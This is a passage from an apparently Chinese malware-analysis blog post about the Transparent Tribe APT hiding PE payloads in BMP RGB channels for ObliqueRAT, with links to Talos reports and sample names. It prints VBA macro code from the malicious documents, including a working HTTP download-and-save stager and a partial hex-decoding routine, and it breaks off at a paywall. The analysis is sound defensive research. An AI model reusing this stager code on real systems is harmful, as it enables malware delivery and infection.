这篇博客介绍了Transparent Tribe APT如何利用BMP的RGB通道隐藏PE数据,涉及ObliqueRAT的新活动和恶意文档。文章讨论了图片文件头尾、RGB通道隐写和LSB隐写技术,并提供了样本分析。
透明部落通过BMP的RGB通道隐藏PE数据
-
- 报告和样本
-
- [《Transparent Tribe APT expands its Windows malware arsenal》](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
- [《ObliqueRAT returns with new campaign using hijacked websites》](https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html)
- [《ObliqueRAT: New RAT hits victims' endpoints via malicious documents》](https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html)
- 样本
- 知识扩展图片隐写
报告和样本
《Transparent Tribe APT expands its Windows malware arsenal》
没什么技术分析,主要是描述战术和趋势
《ObliqueRAT returns with new campaign using hijacked websites》
有描述宏代码,以及RAT的更新
《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》
内容为ObliqueRAT分析,也可以看看
样本
theta.bmp
camela.bmp
merj.bmp
宏代码
DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)
'下载图片
Sub DownloadBackground(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 4
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
WinHttpReq.Open \"GET\", url, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
Set Themeream = CreateObject(\"ADODB.Stream\")
Themeream.Open
Themeream.Type = 1
Themeream.Write WinHttpReq.responseBody
Themeream.SaveToFile filePath, 1
Themeream.Close
End If
End If
End Sub
'PE文件大小
Private Function BackgroundSize(ByVal ProtectString As String) As Byte()
Dim Nibbles() As Byte
Dim ProtectPos As Long
Dim ProtectDigit As Long
Dim CursorLen As Long
Dim Numeris As Long
ReDim Nibbles(Len(ProtectString) \\ 2)
For ProtectPos = 1 To Len(ProtectString)
ProtectDigit = InStr(\"0123456789ABCDEF\", _
UCase$
最低0.47元/天 解锁文章
2947
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
